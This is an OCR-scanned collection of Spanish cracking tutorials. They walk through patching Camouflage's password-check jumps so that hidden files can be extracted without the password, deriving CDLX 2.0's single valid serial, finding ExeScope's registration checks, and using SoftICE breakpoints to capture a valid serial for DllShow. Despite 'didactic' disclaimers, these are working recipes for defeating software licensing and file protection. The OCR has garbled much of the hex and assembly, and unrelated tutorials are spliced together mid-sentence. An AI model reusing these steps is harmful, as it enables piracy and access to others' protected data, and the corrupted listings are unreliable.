Este programa se ha extendido mucho en aquellos sites que ofrecen musica en formato mp3, tanto canciones 
como full albums. Y muchas veces el que sube las canciones o se olvida de indicar el password o lo hace con 
otro que no es el que indica. 


Como este es un programa FreeWare no hay nada que petar o ningún serial que vulnerar. No obstante tiene un 
punto flaco que es por lo que lo vamos a atacar. 


Segun la filosofia de este programa, sirve para ocultar información para los ojos de desaprendidos dentro de 
otros ficheros, pero, como lo oculta ? Relamente utiliza ténicas de esteganografía ? Encripta la información ? 
Que tan seguro és ? 


Seguridad 


Para contestar estar preguntas vamos a hacer unas cuantas pruebas tipicas de cualquier criptoanalisis. (para 
hacer estar pruebas es necesario tener instalado el Camouflage) 


Cogemos nuestro NOTEPAD o cualquier editor de plain-text y creamos un fichero con una cadena en su 
interior. Por ejemplo: 


daa [FILE.TXT] 


a [FILE.TXT] 


Ahora buscamos una imagen, gif o jpg de tamanyo pequenyo (Por ejemplo: img.jpg) y lo guardamos en un 
directorio todo junto. Ahora con el Camouflage, camuflamos nuestro txt dentro del jpg con un password 
determinado: moneo. Esto nos dará un fichero pass01.jpg. Ahora repetimos los pasos, pero le cambiamos el 
password: mone0 y el fichero de salida pass02.jpg. 


Bien, con esto conseguimos tener dos ficheros, con el mismo contenido pero con diferente método de 
encriptación, ya que el password es diferente. Lo más básico que sigue es comparar los ficheros para 
asegurarnos que son realmente distintos. Yo personalmente he utilizado el FC32b de Plushmm « The+0Q, ya 
que el FC del DOS no me reconocia los cambios, y cual es la sorpresa cuando vemos que apenas sólo cambias 
unos pequenyos bytes muy al final de los ficheros!!!. 


Con esto deducimos varias cosas: 


o No existe encriptación con password. 
o El password viaja con el fichero camuflado. 
o Nuestros ficheros son vulnerables a cualquier ataque 


Ataques 


Ahora vamos a mirar con cualquier editor, el contenido de nuestro fichero camuflado, y afortunadamente 
descubrimos que su contenido está realmente codificado, vamos, que la sentencia [Moneo] que hemos escrito 
en nuestro Plain-text no puede leerse a simple vista, un voto de confianza para el programador. 


El siguiente paso es atacar el password. Para ello nos preparamos con el debugger, activamos el Camouflage y 
en la pantalla del password le introducimos uno erroneo a ver que dice. 


Típica ventana de error, aqui el programador la ha cagado, eso significa que de alguna forma el password es 
vulnerable. Llegados este punto es momento de activar el debbugger, con el típico bpx hmemcpy, haciendo 
varios p ret aterrizamos en la runtime de VB, ***blasfemia***, seguimos tirando hacia atras con el p ret hasta 
llegar al programa original CS:4188AC. 


SBDO mov edx, eax 

8D8D64FFFFFF lea ecx, dword ptr [ebp+FFFFFF64] 
FFD3 call ebx 

50 push eax 

FF15E4104000 Call dword ptr [004010F4] 


8D8D64FFFFFF lea ecx, dword ptr [ebp+FFFFFF64] 
s1 push ecx 
8D9568FFFFFF lea edx, dword ptr [ebp+FFFFFF68] 


Vemos que justo debajo hay una rutina de VB, la de vbaStrCmp, esto nos va a ayudar mucho a más a encontrar 
donde parchear el programa. Seguimos debugando y comprobando hacia donde apunta las variables más 
comunes: EAX, EBX, EDX, EDI, ESI en cada uno de sus cambios, y más o menos por la linea CS:4189BD 
vemos como EAX apunta al password comprimido en el fichero (acordaros que las cadenas en VB son 
diferentes que en otros lenguajes ya que estas van seguidas en cada uno de sus caracters por un 00h, por 
ejemplo, [Moneo] sería SBh 4Dh 6Fh 6Eh 65h 6Fh 5Dh en VB nos quedaría como 5Bh 00h 4Dh 00h 6Fh 00h 
6Eh 00h 65h 00h 6Fh 00h 5Dh 00h) , hemos encontrado la rutina de desencriptado!. Luego ya la miraremos, 
ahora vamos a buscar el parche. Seguimos traceando, hasta encontrar algun salto un tanto sospechoso y tiene 
que estar muy cerca. Si miramos el código, nos encontramos dos, uno en CS:418998 y otro en CS:418A13 que 
son muy sospechosos. El primero es sospechoso por que nos hace saltar y el segundo, por que nos lleva a un 
punto de programa muy lejos del actual. Si en tiempo de debugger cambiamos el primer saldo y le decimos que 
no salte, nos lleva al segundo y si a este le decimos que tampoco salte, nos hace pasar a la siguiente pantalla del 


Camouflage, como si hubiesemos introducido correctamente el password. 


:00418998 7D18 

:0041899A 68A0000000 
:0041899F 68E8964000 
:004189A4 8B8D88FEFFFF 
:004189AA 51 

:004189AB 50 

:004189AC FF1568104000 
:004189B2 8D9S6CFFFFFF 
:004189B8 52 

:004189B9 8D463C 
:004189BC 50 

:004189BD E86E290100 
:004189C2 8BDO 
:004189C4 8D8D64FFFFEFF 
:004189CA FFD3 
:004189CC 50 

:004189CD 8B8568FFFFFF 
:004189D3 50 

:004189D4 FF15E4104000 
:004189DA 8BD8 
:004189DC F7DB 
:004189DE 1BDB 


jge 004189B2 

push O000000A0 

push 004096E8 

mov ecx, dword ptr [ebp+FFFFFFE88] 
push ecx 

push eax 

Call dword ptr [00401068] 

lea edx, dword ptr [ebp+FFFFFF6C] 
push edx 

lea eax, dword ptr [esi+3C] 

push eax 

call 0042B330 

mov edx, eax 

lea ecx, dword ptr [ebp+FFFFFF64] 
call ebx 

push eax 

mov eax, dword ptr [ebp+FFFFFF68] 
push eax 

Call dword ptr [0040104] 

mov ebx, eax 

neg ebx 

sbb ebx, ebx 


:004189E0 F7DB 
:004189E2 F7DB 
:004189E4 8D8D68FFFFFF 
:004189EA 51 

:004189EB 8D9564FFFEEF 
:004189F1 52 

:004189F2 8D856CFEFFEF 
:004189F8 50 

:004189F9 6A03 

:004189FB FF15C0114000 
:00418A01 83C410 
:00418A04 8D8DSOFFFFFF 
:00418A0A FF1550124000 
:00418A10 6685DB 
:00418A 13 0F859B 150000 
:00418A19 8B4DC4 


Con estos descubrimientos ya podemos hacer un parche para esos dos ¡mps para que la inclusión del password 
en los ficheros camuflados sea inutil. Aunque podemos seguir buscando para ver si conseguimos desencriptar el 


password. 


neg ebx 

neg ebx 

lea ecx, dword ptr [ebp+FFFFFF68] 
push ecx 

lea edx, dword ptr [ebp+FFFFFF64] 
push edx 

lea eax, dword ptr [ebp+FFFFFF6C] 
push eax 

push 00000003 

Call dword ptr [004011C0] 

add esp, 00000010 

lea ecx, dword ptr [ebp+FEFFFFSO] 
Call dword ptr [00401250] 

test bx, bx 

jne 00419FB4 

mov ecx, dword ptr [ebp-3C] 


En definitiva, esta es una utilidad insegura, ya que los ficheros van ocultos pero no protegidos. 
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CDLX 2.0 


Número de Serie , una nag-screen con un pequenyo temporizador a 10 sec. 
Obtener un número de serie válido 


Este es un programa que te deja en el Tray un PullDown para cerrar la machine y borrar el 
recent o el history del IE, etc 


3 


http://www.yeohhs.com/swwin 


Softlce 
[Moneo] FECHA: 09/10/2002 


INTRODUCCION 


Si estas buscando cracks o serials, aqui no los vas a encontrar. Todo lo que aquí se describe es 
puramente didactico, lo que el usuario final realice con dicha información sólo le acontece a él. 
Te recomiendo que si tienes la oportunidad adquieras el programa de forma legal, ya que de 
esta manera contribuyes a que el programa continue desarrollandose. 


El autor sólo pretende ensenyar los diferentes métodos de protección que tienen los programa, 
no abusando de dicha información 


Overview 


Este es un programa que te deja en el Tray un PullDown para cerrar la machine y borrar el recent o 


el history del IE, etc 


AL ATAKE 


Para obtener el serial correspondiente, simplemente ejecutaremos el programa, e iremos al Pull-Down. Nos sale un 
Pop-Up pidiendonos el serial. Introduciremos un numero al azar y veremos que es lo que pasa. No sale otra ventana 
dicindonos que nos hemos colao, eso significa que tiene detección de serial, lo típico, bpx hmemcpy desdepués de 
introducir el serial y antes de apretar el [OK]. Y más o menos aterrizaremos por aqui: CS:401C36 


FF15E0704000 call [0004070E0]GetDlgltemTextA 
8D442428 lea eax,[esp][00028] 

8D4C240C lea ecx,[esp][0000C] ¡Nuestro serial 

50 push eax 

51 push ecx 

ESAB010000 call 000001DO ;Aqui calcula el nuevo serial 
83C408 add esp,08 

BE50814000 mov esi,00408150 ¡Cadena un tanto peculiar 
8D442428 lea eax,[esp][00028] ¡Cadena generada dentro del call anterior 
sAl0 mov dl, [eax] 

SAlE mov bl, [esi] 


Hemos caido justo en el punto ideal, tenemos diferentes cadenas que son realmente sospechosas, lo mejor es analizar el 
calculo que hay dentro del cal! CS:401DFO0. 


83ECIC sub esp,1C 

B906000000 mov ecx,00000006 

33C0 xXor eax,eax 

33D2 xor edx,edx 

53 push ebx 

26 push esi 

57 push edi 

BE70834000 mov esi,00408370 ¡Apunta a una constante 
8D7C240C lea edi,[esp][0000C] 

8B5C242C mov ebx,[esp][0002C] ¡Apunta a nuestra cadena 
EAS repe movsd 

66A5 movsd 

SBFB mov edi,ebx 

83C9FF or ecx,FF 

F2AF repne scasb ;Busca la longitud de la cadena 
E7D1 not ecx 

49 dec ecx ¡Longitud de nuestra cadena 

8BF1 mov esi,ecx 

85F6 test esi,esi 

7E32 jle 00000062 ---------- (1) 

8B 402430 mov ecx,[esp][00030] 

SBFB mov edi,ebx 

8D44240C lea eax,[esp][0000C] 

55 push ebp 

2BF8 sub edi,eax 

8BE9 mov ebp,ecx 

8D442410 lea eax,[esp][00010] 

2BES8 sub ebp,eax 

8D441410 lea eax,[esp][edx][00010] (2) ¡Apunta a una constante 
8A1C07 mov bl, [edi][eax] ¡nByte de nuestra cadena 
0218 add bl,[eax] ¡Suma nByte de nuestra cadena con el de la constante 
42 inc edx ¡Contador de longitud 

3BD6 cmp edx,esi 

881C28 mov [eax][ebp],bl ;El resultado de la suma lo guarda 


31 00000045 ---------- (2) ;Salta si no final 


5D mov d,[esi][ecx],00 
C6040E00 pop edi 

SF pop esi 

SE pop ebx 

SB add esp,1C 
83C41C 

C3 retn 

8B4C2430 mov ecx,[esp][00030] (1) 
SF pop edi 

C6040E00 mov d,[esi][ecx],00 
SE pop esi 

5B pop ebx 

83C41C add esp,1C 

C3 retn 


De todo esto deducimos lo siguiente, el programa tiene una constante, por ejemplo: 7684142980000000 y una cadena 
edfemnmndede, entonces lo que haces es sumar nuestro serial introducido por teclado(p.e. 1231321) con su constante: 


K+ 37h 36h 38h 34h 31h etc... 
S+ 31h 32h 33h 31h 33h etc... 
T= 68h 68h 6Bh 65h 64h etc... 


Y luego si continuamo traceando, vemos como compara la nueva cadena T con la que tiene también metida 
(edfemnmndede). Por lo tanto ya podemos deducir el serial a utilizar, simplemente restamos las dos constantes: 


K+ 65h 68h 6Bh 67h 60h etc 
K- 37h 36h 38h 34h 30h etc... 
S= 32h 32h 33h 33h 30h etc... 


Bueno, como vemos este programa sólo tiene la posibilidad de generar un unico serial en toda su vida, fue bonito 
mientras duró... Por cierto, las constantes utilizadas son un ejemplo, buscalas en el ejecutable. 


Cuando hayamos introducido correctamente el serial veremos con el programa genera un fichero que contiene la K- 
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gusto”, no sé, 


lo crackees, lexe, k pa eso estamos akí. 


Serial 


Utilidad para manipular ejecutables y librerías con 
bastante facilidad (cuadros de diálogo, Cadenas de 
texto...) 


Protozoo (algo así como 3% de la ESO) 
http://karpoff.redfutura.net/ 
Softice W32dasm Editor Hexadecimal 


MacEdu FECHA: 22/08/2002 


INTRODUCCION 


Erase una vez un niño que estaba muyyy aburrido de estudiar Campos 
Electromagnéticos Il y decidió ponerse a hacer algo útil. Por ello se imprimió el 
documento “Descabezando archivos ejecutables portables” de nuMIT_or (el cuál 
recomiendo hasta al más pequeño de la familia) y se puso a leer. Cuál fue su sorpresa 
cuando de repente se recomendaba en dicho texto usar el programa ExeScope. Nada 
más fácil, buscas un poco por internet y lo bajas. Sin embargo tiene un problema, y 
es que no te deja realizar más de una modificación en el archivo que abras 
(compruébalo si no me crees) a no ser que estés registrado. 

Solución A: Paga lo que toca y te registras. 
Solución B: Utiliza lo que sepas y obtén una maravillosa prueba de evaluación “a tu 


probarlo durante 70 años y si te convence, comprarlo. En resumen: Ke 


AL ATAKE 


Sin más rollo, vamos a lo que nos interesa. El archivo a elegir para monitorizar no tiene pega 
alguna ya que hay un archivo enorme (comparado con los demás archivos de este programa) 
le encima es el ejecutable. Pues nada, lo ejecutamos y todo perfecto hasta que tiramos a 
registrarnos (en el menú Help) y nos dice “Invalid ID or Name”. Maravilloso, un mensajito 
diciéndonos que nos hemos equivocado de clave. 

En un primer momento la reacción es siempre la misma, irnos al desensamblador (yo he 
usado el W32Dasm) y buscamos esa cadena con la linternita o en String References. Mierda, 
la cadena no está, y encima sigo sin novia. Aunque no os lo creáis, la solución a lo primero es 
más sencilla que la de lo segundo. Dicen, que si todo falla, va siendo hora de que te leas las 
instrucciones, pero en nuestro caso es “Arranca el SoftICE”. Me encanta este programa, no sé 
por qué al tenerlo cargado el Kazaa no se me arranca, pero lo primero es lo primero (por 
cierto, si alguien sabe por qué, que me lo cuente). 


Pues eso, cargamos el ExeScope con el Symbol Loader y ahora a pensar dónde ponemos el 
breakpoint. Lo suyo sería en el MessageBeep que debería haber saltado al meter la clave 
errónea, pero mira por dónde, al autor de ExeScope se le olvidó el detalle del pitidito. Sin 
desesperar, vamos al desensamblador y miramos las rutinas que carga. Vemos que de 
user32.dll usa LoadStringA, función que es muy probable que use para leer el nombre y la 
clave. Pues nada, una vez que ya tenemos arrancado el ExeScope, vamos al SoftICE y 
ponemos “bpx LoadStringA”. Pulsamos X para volver al programa, escribimos nuestro 
nombre y pass, le damos a OK y... BINGO, nos salta el SoftICE. Pensemos un poco. El 
cuadro de diálogo en el que estábamos era bien simple: 2 cuadros de texto, uno para el 
nombre y otro para la clave. Por ello, lo más probable es que primero se haga una llamada a 
LoadStringA para leer el nombre, y luego otra llamada a esa misma función para leer la 
clave. Por tanto, salimos del SoftICE pulsando Ctrl+D, y como era de esperar, nos vuelve a 
saltar el SoftICE en el otro LoadStringA. Vamos pulsando F10 para ir avanzando por el 
código y de repente, en la dirección 004587AS5, nos salta la ventana de error que ya 
conocíamos. Pues nada, le damos a OK, con lo que volvemos al SoftICE y podemos ver lo 
que tenemos. Como ya he adelantado, lo que vemos es que en la dirección 004587A5 
tenemos un CALL como una catedral a nuestro mensaje de error. 


Ya parece que estamos situados en la parte del código que nos interesa. Pues nada, volvemos 
al desensamblador y vamos a esa dirección mediante “Goto Code Location”. Con ello nos 
situamos en la línea donde llamamos al cuadro de error, pero lo que nos interesa es no llegar 
ahí (porque eso ya es la rutina que nos avisa del error, y lo que queremos es llegar a donde 
decide que la clave es errónea), por lo que miramos varias líneas más arriba y vemos lo 
siguiente: 


La línea del asterisco nos indica que el programa salta a la dirección 004587A0 desde 

00458790 y 00458794. Todos hemos visto las películas de Indiana Jones, lo que hace que 

nuestro espíritu aventurero nos obligue a ir a esas dos líneas a ver esos saltos de los que nos 

habla. Pues sí, vale, saltos al error, pero ninguno que salte fuera del error (con lo que saltaría 

a la parte del código que se ejecutaría en caso de que metiésemos la clave correcta). Pues akí 

la cosa está clara, seguimos mirando hacia arriba, y vemos que hay una referencia de un 
ALL. 


Esto nos lleva a suponer que todo el código que hemos estado viendo es en sí la rutina de 
error, por que la comprobación de la clave ha de estar en otro punto del código que cuando 
detecta que no es correcta, salta aquí. Como es lógico, esa otra parte del código ha de estar en 
0045871A. Nos vamos a esa línea y vemos lo siguiente: 


:0045871A 


De nuevo sin saltos. Sin embargo hay un par de referencias a esta función. Elegimos 
ualquiera de ellas (porque el que haya dos tan solo significa que en dos puntos del programa 
se comprueba la clave), por ejemplo 004A61F4 y llegamos a esto: 


:004A61F4 


omo se puede apreciar, en 004A60F5 y en 004A61D7 hay saltos incondicionales que saltan 
la llamada a nuestra rutina de error (es decir, saltan a donde debería continuar el programa en 

aso de que acertásemos con la clave), por lo tanto ha de haber otros saltos que eviten estos y 
dejen que el programa llegue a la rutina de error. Como podemos ver en las referencias, estos 
saltos están en 004A6146 y en 004A615A. 


Efectivamente, tenemos un JE y un JLE que nos hacen saltar a nuestra función de error. El 
primer salto que encontramos es el del JE, que 


Proyectos con Numega SoftlIce ó TRW2000 


herramienta principal con la que han sido estudiados, 
aprender a utilizar tan complicada herramienta, no ?? 


buena manera d 


PROGRAMA 
DlUShow 4.3 
Win-eXpose Reg.V1.0 
Particle Fire v1.1a 
InWatch95 1.3a 
WinXFiles V4.2 
Axman V3.01 
Gif Movie Gear 


Quik Heal 
FreeHand V8.01 


Kriptel V3.5 
Serial 2000 V6.0 


WinBabel V4.2 (Pac) 


La funcion hmemcpy 


NetSpy 1.5 
Screen Loupe Magnifier v 4.7 


Visual Zip Password Recorvery V4.0 


Final 
Scrollworks cascader 1.03 


Numega SmartCheck 6.03 
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| INTRODUCCION 


HH Tutoríal de Crackeo Para Newbies desde Cero 15/08/99 


Por Karpoff, PROYECTO 5 


- Utilización Básica del Soft-Ice. 


- DllShow V4.3 


Hola nuevamente !! Un saludo para todos los que seguís esta serie de Manuales Para 
Newbies desde Cero. 


Con este manual el N*5 Empezamos una nueva fase, Aprenderemos a utilizar el SoftlIce e 
intentaremos capturar un numero de registro valido para nuestro programa. 


Empezare explicando las funciones del Soft-Ice mas utilizadas y las que utilizaremos 


en este caso. 


AL ATAKE 


Primero iniciamos el ordenata y cargamos el Soft-ice (en la Web hay unos tutoriales sobre 
instalación y configuración del Soft.) si todo ha ido bien estamos en Windows y 

aparentemente todo esta igual que siempre pero...... la realidad es otra, hay algo 
controlando los procesos del sistema, es un Debug el mejor y si no probar a pulsar las 
teclas [Ctrl + D] madre mía!!! pero que demonios es esto tan oscuro y con tantos 
números??7??, Bueno esto nos va ha mostrar todo lo que queramos sobre un programa, un proceso 
de un dll, ocx Etc. Paso a paso las teclas mas utilizadas 


Teclas de Funcion del Soft-Tce 


F1 ---- Help 


F2 ---- ventana en la parte superior de la pantalla que nos muestra los valores que van 
llevando EBX, EAX, ECX, EDX, EDI, ESI ETC. 


F4 ---- Nos muestra como esta todo fuera del soft en ese preciso instante, ósea que si 
tenemos un editor HEX abierto en Windows, veremos una imagen capturada del editor , esto es 
muy útil ejemplo: estamos intentado petar un programa y queremos saber en que preciso 
instante nos va ha salir la pantalla que nos avisa, de que el programa esta en evaluación 
para poder saber en que parte del código se ejecuta la orden, pues mientras seguimos paso a 
paso los procesos pulsamos F3 y nos muestra lo que se cuece en ese momento fuera del Soft, 
ya os digo es una imagen capturada como una foto, para volver pulsamos otra vez F3. 


F5 ---- Hace que el programa que estamos Traceando se ejecute normalmente, hasta que se 
encuentre con algún BreakPoint que hallamos puesto lo mismo hace si pulsamos [Ctrl + D] 
desde dentro del Soft, las dos teclas nos sirven para sacarnos del Soft a Windows. 


F8 ---- Con esta tecla vamos ejecutando el programa paso a paso, entrando en todo tipo de 
procesos , Osea que ejecuta la instrucción actual y se pararía en la siguiente asta que 
pulsemos nuevamente F8. 


F10 ---- Lo mismo que F8 pero sin entrar en llamadas ( Call ) se las salta continuando con 
la ejecución en el Retorno ( Ret ) de dicha llamada, 
F11 ---- La definición para esta tecla es, ejecuta hasta una dirección de memoria. (¿77? no 


lo entiendo fe??") yo la utilizo igual que F12 y los resultados son los mismos. 


F12 ---- Nos Retorna al punto donde ha terminado una llamada ejemplo: Imaginamos que estamos 
petando un programa y hemos puesto unos BreakPoints ( Puntos de Ruptura ) para capturar un 
proceso determinado, estamos ejecutando el programa y derrepente hay una llamada al 
BreakPoint que pusimos, lo normal que veríamos en pantalla seria algo así 


Dentro del Softlce 


A A User32!Setwindowtexta+0023 


015F:BFF57740 C20C00 RET 000€ 


USER32!GETWINDOWTEXTA -- momento en que el breakPoint para el programa 


015F:BFF51743 B1A1 MOV CL,Al 


User32!.Text+0740 


aquí ha habido una llamada externa típica a la librería de Windows User32.d11 concretamente 
a Getwindowtexta, y si os fijáis lo resaltado en rojo nos dice que estamos dentro de 
User32.d11 pero a nosotros no nos interesa para nada esta dll, entonces para saber quien 
hizo la llamada a user32.d11 pulsamos F12 y nos mostraría 


Dentro del Softlce 


015F:0041552B FF15B04700 CALL [User32!GetWindowTexta] ----- La llamada 


015F:00415531 5F POP EDI ---- Retornaríamos Aquí 


D11Show!. Text+0001452B 


Pues aquí vemos que la llamada la hizo 0041552B que es una llamada Externa a User32.d11 
concretamente GetWindowTexta , y nosotros hemos utilizado esa llamada para poner un 
BreakPoint (punto de Ruptura ) A un proceso de la librería user32.dl11, El BreakPoint seria 
BPX GetWindowTexta que lo escribiríamos tal y como esta, en la línea de comandos de Soft- 
Ice. cualquier llamada que hubiese a la Función GetWindowTexta nos pararía el programa de 
isofacto para saber de donde se hizo esa llamada pulsaríamos F12. ( Espero que lo estéis 
entendiendo tan bien como yo intento explicarlo J ) Para saber las llamadas externas que 
contienen las D11 solo tenéis que editar la dll que queráis con el Vista Rápida de Windows, 
si lo tenéis instalado sale cuando pincháis con el botón derecho del ratón, sobre un 
archivo, y seleccionáis vista rápida o Quick View o si tenéis instalado el Quick View Plus 
pues mejor, luego todas las llamadas pueden ser utilizadas como BreakPoints dependiendo del 
proceso que queramos seguir. 


BreakPoints o puntos de ruptura 


Los Breakpoinst son la madre del cordero, Se trata de que el programa pare en el momento en 
que hay una llamada a una función de una librería (dl1) que usa el programa. Existen en 
Windows unas librerías ( user32.d11l Kernel32.d11, advapi32.dl11, shel132.d11, gdi32.dl1l Etc.) 
Que son necesarias para la ejecución de un programa en entorno Windows, El ejcutable del 
programa hace uso de estas librerías mediante llamadas a las distintas funciones de cada 
librería, sabiendo que función utiliza para ejecutar un determinado proceso, podremos 
capturarlo en el preciso instante en que comienza la ejecución de dicho proceso, como??77 
Poniendo un breakPoint, como se pone un BreakPoint??? Desde la línea de comandos del Soft- 
Ice con el comando BPX 


BPX getdlgitemtexta BreakPoint a una Función de la librería User32.d11 


BPX getdlgitemtext --- BreakPoint a una Función de la librería User.dll o User32.d11 


Observáis que uno termina en [a] y el otro no. Esta [a] sirve para indicar que estamos 
ejecutando un programa de 32 Bytes , a los programas de l16Bytes no debemos de poner la [a], 
ya que no haría efecto el BreakPoint 


Como puedo saber que BreakPoin tengo que poner??? Como he comentado Cada librería tiene su 
propia lista de funciones que las podemos utilizan como puntos de ruptura o BreakPoints, si 
editáis el ejecutable del programa a crackear con el Quick View o Quick View plus, se os 
mostrara las librerías que utiliza y las funciones de cada librería que utilizara, Tenéis 
que guiaros un poco por instinto, estas funciones tiene nombres que nos pueden sugerir ideas 
interesantes veamos algunos ejemplos. 


Estos son breakPoints muy frecuentes, utilizados para seguir procesos de ventanas de Aviso, 
textos que aparecen cuando intentamos registrar un programa y fallamos etc. 


BPX messagebox 
BPX getdlgitemtexta 
BPX getwindowtexta 


Fijaros en sus nombres Messagebox, WindowTexta J etc. ( vais pillando???) 


También tenemos los que hacen referencia a la fecha, tiempo de caducidad etc. 


BPX getlocaltime 
BPX getfiletime 
BPX getsystemtime 


Creo que con un poco de intuición podemos acertar. Voy a Escribir los mas frecuentes 
extraídos de un texto que saque de la pagina de W.K.T. 


1)General Purposes 


BPX hmemcpy 

BPX showwindow 

BPX updatewindow 

BMSG xxxx wm_gettext / a 
BMSG XXXX wm_command 
BMSG XXXX wm_move 


2) Time Related 


BPINT 21 if ah==2A (DOS) 
BPX getlocaltime 

BPX getfiletime 

BPX getsystemtime 


3)Register Flag Related (e.g. Flag on EAX) 


BPX cs:eip if EAX== (SICE 3,x) 


4) Memory Flag Related (e.g. Flag on 0030:000045AA) 


BPMB cs:eip rw if 0x30:0x45AA== (SICE 3.x) 


5) "Hear The Echo" Technique Related 


BPX 0x30:0x45AA do "d 0x30:0x44BB" (SIC 
BPX CS:0x66CC do "? EAX" (SICE 3.x) 


E 
w 


.Xx) 


6) CD-ROM and Disk Based Schemes 


BPINT 13 if ah==2 (DOS) 
BPINT 13 if ah==3 (DOS) 
BPINT 13 if ah==4 (DOS) 


BPX GetFileAttributesA 

BPX GetFileSize 

BPX GetDriveType 

BPX GetlLastError 

BPX ReadFile 

BPIO -h (Your CD-ROM Port Address) R 


7) Dongle Cracking 


BPIO -h 278 R 
BPIO -h 378 R 


8)Key File Related 


BPINT 21 if ah==3dh (DOS) 
BPINT 31 if ah==3fh (DOS) 
BPINT 21 if ah==3dh (DOS) 
BPX ReadFileA 

BPX CreaterFileA 


9)Keyboard Input Related 


BPINT 16 if ah==0 (DOS) 
BPINT 21 if ah==0xA (DOS) 


Nota: Texto original en inglés de Aesculapius 


Pero de todos estos los que mas utilizaremos son. 


BPX Messageboxa 


BPX Messagebox 


BPX Messageboxexa 


BPX GetWindowTexta 


BPX GetDlgitemTexta 


BPX GetWindowText 


BPX GetDlgitemText 


BPX GetMessagea 


Imaginaros que que queremos conseguir el numero de serie valido para un programa, Que 
BreakPoint pondremos??? Supongo que los grandes CRACKER sabrán cual es el correcto yo no, 
único que os puedo aconsejar es que pongáis 2 o 3 y ver cual salta que podrían ser. 


BPX Messageboxa 


BPX GetWindowTexta 


BPX GetDlgitemTexta 


Y con el que salte continuamos y borramos los demas. los comandos para manipular los 
BreakPoints son. 


Bpx Breakpoint ----- Poner 

BC Breakpoint ----- Borrar , BC. * -===== Borrar todos 

BD Breakpoint ----- Desactivar BD * ----- Desactivar Todos 
BE Breakpoint ----- Activar BE * ----- Activar Todos 
BL ----- Listar todos 


Comandos para ver los procesos que se están ejecutando. utilizaremos. 


D EX ====== nos muestra el contenido de EBX en la ventana de datos 


D EBP-12 ---— nos muestra el contenido de EBP-12 en la ventana de datos 


Yo llamo la ventana de datos, a la ventana que muestra los valores en caracteres, junto a 


los valores en hexadecimal, y es que algunas veces tendremos que buscar el n” que buscamos 


en esa ventana o con una [?] en la línea de comandos. 


? EBX ---- nos muestra el valor de EBX en la línea de comandos 


? EBP-12 - nos muestra el valor de EBP-12 en la línea de comandos 


Para manipular una determinada parte del código. utilizaremos el comando 


A. ===== ensamblar 


En los manuales anteriores hemos manipulado los datos para petar el programa con un editor 


lo 


HEX, en el Soft podemos manipular pero los cambios solo quedan manipulados en memeoria, Ósea 
Temporalmente hasta que ejecutemos nuevamente el programa. Esto es muy útil para probar si 
hemos acertado con el proceso que queremos cambiar. Por ejemplo 


Localizamos un salto 


00425012 74A1 je 00425012 para cambiarlo a un jmp haremos lo siguiente 


A 00425012 [Intro]-—pulsar 


0105:00425012 -----====-- El soft nos mostrara solo la dirección de memoria para que la 
rellenemos con los datos que tengamos pensado aplicar. 


0105:00425012 3jmp 00425012 [Intro] ----- En rojo los datos que hemos metido 


0105:00425014 ====-=-= === El soft nos da la siguiente dirección de memoria por si queremos 
seguir cambiando cosas, si no vamos a Cambiar nada mas pulsamos Intro y hemos cambiado un 
salto ( Pero solo en memoria. ) 


Bueno Creo que he explicado lo suficiente del Soft como para empezar con nuestro programa. 
Recomiendo a la Peña que nunca ha utilizado el Soft, que antes de continuar con el Tutoríal, 
practiquéis con el soft lo que he explicado, probar con una copia de cualquier programa a 
pulsar F8, F10 , F11, Poner BP Etc. hasta que lo conozcáis un poco 


Parte II 


Buscando un Numero de Registro valido para. 


D11Show V4.3 Que lo tenéis en: 


http://tucows.teleweb.pt/files4/dllshow.ZIP 


Cuento con que ya habéis salseado con el Soft, esta configurado ( en la Web tenéis un manual 
sobre configuración e Instalación.) y lo tenéis cargado. 


Empezamos: Hoy registraremos nuestro programa con un n/s valido, este numero variara según 
el nombre de usuario que pongamos, Ósea que cada cual puede poner el suyo. 


Ataque Capturar la rutina que se encarga de verificar el n/s que hemos metido, y seguir su 
ejecución hasta el momento en que compare nuestro n/s con uno valido. 


Abrimos el Soft y cargamos el ejecutable Dllshow.exe. Pulsamos el boton de los engranajes ( 
load para los amigos ) y nos sale una ventanita con un aviso, [Symbol Translations /Load 
Error] Pulsamos [Sil y entramos directamente al Soft, pulsamos F5 o [Ctrl + D] para que se 
ejecute el programa que tenemos cargado, y salimos nuevamente a Windows, pero esta vez se 
esta iniciando D11Show. Ahora hay que poner los datos del registro, pulsamos Help y 
Register... y nos sale una ventana que nos pide tres datos, rellenamos como queramos. 


User Name: OWL (buho) 


Organization: 0OWL 


Registrations :123456789 


Y ahora tenemos que poner un BreakPoint para poder seguir paso a paso todo el proceso de 
crear y comparar el n/s. probamos con Getwindowtexta, Pulsamos [Ctrl+D] y entramos en el 
Soft, Venga a poner el BP (como se ponía sabéis no?) 


BPX getwindowtexta una vez puesto pulsamos F5 o [Ctrl+D] Para Salir a Windows ahora pulsamos 
aceptar en la ventana de registro y L Cascaras!!! No ha pasado nada nos ha salido la ventana 
de que el n/s no es correcto. Probaremos con otro BP pulsamos nuevamente [Ctrl1+D] y borramos 
el BP que habíamos puesto 


BC * [Intro] ===== Borrar BP 


Ahora probamos con otro 


BPX getdlgitemtexta y pulsamos nuevamente F5 o [Ctrl1+D] Para Salir a Windows ahora pulsamos 
aceptar en la ventana de registro y J esta vez si saltamos al soft concretamente en. 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,Al 


Que es esto? La primera llamada que hace el programa, desde que pusimos el BP a la función 
Getdlgitemtexta. En este momento nos encontramos dentro de User32.d11l 


Recordar para saber quien ha hecho la llamada que tecla teníamos que pulsar... Bien F12 y 
nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015f:00415531 5F POP EDI 


T 


015D:00415532 5E POP ESI ---- Captura User Name 


AQUÍ vemos que ESI NOS HA CAPTURADO el primer campo del formulario, comprobarlo poniendo en 
la línea de comandos del Soft 


D esi veremos en la ventana de caracteres OWL (buho) 


Podríamos ir ejecutando el programa paso a paso , pero se haría eterno ya que si solo a 
Capturado el primer campo, supongo que utilizara el mismo sistema para capturar los otros 
dos, Ósea que pulsamos nuevamente F5 y aparecemos otra vez en. 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,A1l 


La segunda llamada que hace el programa, desde que pusimos el BP a la función 
Getdlgitemtexta. En este momento nos encontramos dentro de User32.d11 


Pulsamos F12 para terminar esta llamada y nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015f:00415531 5F POP EDI 


015D:00415532 5E POP ESI ----- Captura Organization 


T 


si antes Capturo el User Name y el valor lo llevaba ESI miremos otra vez que hay en ESI 


